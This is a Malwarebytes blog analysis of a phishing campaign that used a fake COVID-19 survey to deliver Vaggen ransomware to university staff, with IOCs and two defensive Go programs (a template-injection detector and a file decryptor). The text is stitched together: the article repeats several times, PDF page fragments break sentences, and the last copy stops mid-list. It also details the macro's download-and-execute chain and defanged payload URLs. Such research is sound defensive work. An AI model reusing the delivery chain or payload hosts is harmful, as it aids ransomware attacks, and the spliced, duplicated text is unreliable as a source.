This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 488 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 489 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam coming from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to see whether it succeeded (on success, the return value is the task ID of the executed application)
If successful, it sends an HTTP GET request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If not, it sends an HTTP GET request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event; it can be very useful as an early warning system that an intruder has gained access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Three of them could be mapped to their role:
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback passed to the standard Go function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here: it uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom, and the file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs
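The template injection described in the phishing document analysis leaves a footprint inside the .docx itself: an attachedTemplate relationship whose Target is a web URL. The following is an added example (not code from the Malwarebytes post): a Go triage check that opens a .docx from memory and reports any such relationship. The sample document, its placeholder URL and the function names are constructed for the example; the relationship type URI and the word/_rels/settings.xml.rels location are standard OOXML, not something the post states.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// OOXML relationship type that points a Word document at its template; template
// injection sets its Target to a URL so Word fetches a remote .dotm and runs its macros.
const attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// Finding records one attachedTemplate relationship that points at a web URL.
type Finding struct {
	Part   string // the .rels part holding the relationship
	Target string // the external URL the template is fetched from
}

// relationships mirrors the parts of the OOXML .rels schema we need.
type relationships struct {
	XMLName       xml.Name `xml:"Relationships"`
	Relationships []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// FindRemoteTemplates reads a .docx (a zip container) from memory and returns every
// attachedTemplate relationship whose Target is an http(s) URL. Benign documents either
// have no attachedTemplate or point it at a local file:/// path, so only web targets count.
func FindRemoteTemplates(docx []byte) ([]Finding, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not a zip/OOXML container: %w", err)
	}
	var findings []Finding
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			continue // a malformed .rels part is skipped; the others are still scanned
		}
		for _, r := range rels.Relationships {
			target := strings.ToLower(r.Target)
			if r.Type == attachedTemplateType && r.TargetMode == "External" &&
				(strings.HasPrefix(target, "http://") || strings.HasPrefix(target, "https://")) {
				findings = append(findings, Finding{Part: f.Name, Target: r.Target})
			}
		}
	}
	return findings, nil
}

// buildSampleDocx constructs a minimal .docx in memory for testing (not a real
// sample). With external=true the settings part references its template by URL,
// the same footprint as the injected survey document.
func buildSampleDocx(target string, external bool) []byte {
	mode := ""
	if external {
		mode = ` TargetMode="External"`
	}
	parts := map[string]string{
		"word/settings.xml":            `<?xml version="1.0"?><w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:attachedTemplate r:id="rId1"/></w:settings>`,
		"word/_rels/settings.xml.rels": `<?xml version="1.0"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="` + attachedTemplateType + `" Target="` + target + `"` + mode + `/></Relationships>`,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		io.WriteString(w, body)
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	doc := buildSampleDocx("http://template-host.invalid/template.dotm", true) // constructed placeholder URL
	findings, err := FindRemoteTemplates(doc)
	fmt.Println(findings, err)
}
```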
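Given the .VAGGEN layout described in the ransomware section (12-byte nonce, ciphertext, 16-byte GCM tag) and the hardcoded key quoted there, recovery is a single AES-256-GCM open. The following is an added example (not the malware's code and not a Malwarebytes tool): a Go recovery routine for that layout, exercised on a sample file constructed in the same layout; the function names, the sample content and the fixed nonce are assumptions of the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
	"strings"
)

const (
	nonceLen  = 12 // nonce stored at the start of every .VAGGEN file
	tagLen    = 16 // GCM tag stored at the end
	vaggenExt = ".VAGGEN"
)

// vaggenKey is the hardcoded 32-byte AES-256 key reported in the analysis.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

// DecryptVaggen parses the nonce || ciphertext || tag layout and returns the
// plaintext. Because GCM authenticates, a truncated or corrupted file fails the
// tag check and returns an error instead of silently producing garbage.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	if len(key) != 32 {
		return nil, errors.New("AES-256 needs a 32-byte key")
	}
	if len(blob) < nonceLen+tagLen {
		return nil, fmt.Errorf("file too short for the .VAGGEN layout: %d bytes", len(blob))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // default 12-byte nonce, 16-byte tag
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:nonceLen], blob[nonceLen:]
	plaintext, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("GCM authentication failed (wrong key or damaged file): %w", err)
	}
	return plaintext, nil
}

// RestoredName strips the .VAGGEN extension so the plaintext can be written back
// under the original name; ok is false for files the ransomware did not touch.
func RestoredName(name string) (restored string, ok bool) {
	if !strings.HasSuffix(name, vaggenExt) {
		return name, false
	}
	return strings.TrimSuffix(name, vaggenExt), true
}

// sealSample builds a .VAGGEN-style blob the way the analysis describes
// (gcm.Seal with the nonce prepended) so the decryptor can be exercised
// offline. The caller supplies the nonce so the sample is reproducible.
func sealSample(plaintext, key, nonce []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	out := append([]byte{}, nonce...)
	return gcm.Seal(out, nonce, plaintext, nil), nil
}

func main() {
	// Constructed sample file content; not data from the incident.
	plaintext := []byte("constructed sample: lab notes, week 42")
	nonce := bytes.Repeat([]byte{0x42}, nonceLen)
	blob, err := sealSample(plaintext, vaggenKey, nonce)
	if err != nil {
		panic(err)
	}
	got, err := DecryptVaggen(blob, vaggenKey)
	fmt.Printf("recovered %q (err=%v)\n", got, err)

	blob[nonceLen] ^= 0x01 // flip one ciphertext byte: the tag check must now fail
	_, err = DecryptVaggen(blob, vaggenKey)
	fmt.Println("tampered file rejected:", err != nil)

	name, _ := RestoredName("thesis.docx" + vaggenExt)
	fmt.Println("restore as:", name)
}
```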
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 511 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 512 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 513 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 514 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 515 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 516 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 517 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 518 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 519 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 520 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 521 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we've observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
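As an added illustration (not part of the original post, and neither Malwarebytes' tooling nor the attacker's code), the Go program below shows what template injection looks like at the file level and how to check for it without opening the document in Word. A .docx is a zip container; the attached template is recorded in word/_rels/settings.xml.rels as an attachedTemplate relationship, and template injection means that relationship has TargetMode="External" with an http(s) URL as its Target. The program builds minimal documents in memory as constructed fixtures (the URL https://example.invalid/template.dotm and the local Normal.dotm path are placeholders, not indicators from this campaign) and flags only the remote one: a document saved from a custom template legitimately carries a file:// target, so matching on TargetMode alone would produce false positives.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// Added example for this post, not Malwarebytes' tooling: a static check for remote template
// injection. Word records the attached template as a relationship of word/settings.xml;
// TargetMode="External" with an http(s) Target is the injection footprint, while a file://
// Target is what a locally attached template looks like.

const settingsRels = "word/_rels/settings.xml.rels"

type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// RemoteTemplates returns every http(s) attachedTemplate target in the document (nil if none).
func RemoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML container: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if f.Name != settingsRels {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", settingsRels, err)
		}
		for _, r := range rels.Rels {
			target := strings.ToLower(r.Target)
			if strings.HasSuffix(r.Type, "/attachedTemplate") && strings.EqualFold(r.TargetMode, "External") &&
				(strings.HasPrefix(target, "http://") || strings.HasPrefix(target, "https://")) {
				hits = append(hits, r.Target)
			}
		}
	}
	return hits, nil
}

// BuildDocx assembles a minimal OOXML zip in memory; it is a constructed fixture, not a real sample.
func BuildDocx(rels string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	parts := map[string]string{
		"[Content_Types].xml": `<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`,
		"word/document.xml":   `<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>`,
		"word/settings.xml":   `<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>`,
	}
	if rels != "" {
		parts[settingsRels] = rels
	}
	for name, body := range parts {
		w, _ := zw.Create(name)
		io.WriteString(w, body)
	}
	zw.Close()
	return buf.Bytes()
}

const relsHeader = `<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">`
const attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// InjectedRels points settings.xml at a remote .dotm; the URL is a placeholder, not the actor's.
var InjectedRels = relsHeader + `<Relationship Id="rId1" Type="` + attachedTemplateType +
	`" Target="https://example.invalid/template.dotm" TargetMode="External"/></Relationships>`

// BenignRels is what a document created from a local custom template looks like (placeholder path).
var BenignRels = relsHeader + `<Relationship Id="rId1" Type="` + attachedTemplateType +
	`" Target="file:///C:\Users\alice\AppData\Roaming\Microsoft\Templates\Normal.dotm" TargetMode="External"/></Relationships>`

func main() {
	for _, c := range []struct{ name, rels string }{{"injected", InjectedRels}, {"benign", BenignRels}, {"no-rels", ""}} {
		hits, err := RemoteTemplates(BuildDocx(c.rels))
		fmt.Printf("%-8s remote templates=%v err=%v\n", c.name, hits, err)
	}
}
```

To triage real samples, read the .docx bytes from disk and pass them to RemoteTemplates; the same relationship check applies to .dotm and .docm files, and the flagged URL is the one to pull the remote template from for macro analysis.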
That remote template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell call to see whether it succeeded (Shell returns the task ID of the launched application)
If successful, it sends an HTTP GET request to:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn't successful, it sends an HTTP GET request to:
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.

This can be very useful as an early warning notification system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files and adds the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as 'main_main'.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Their roles map as follows:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
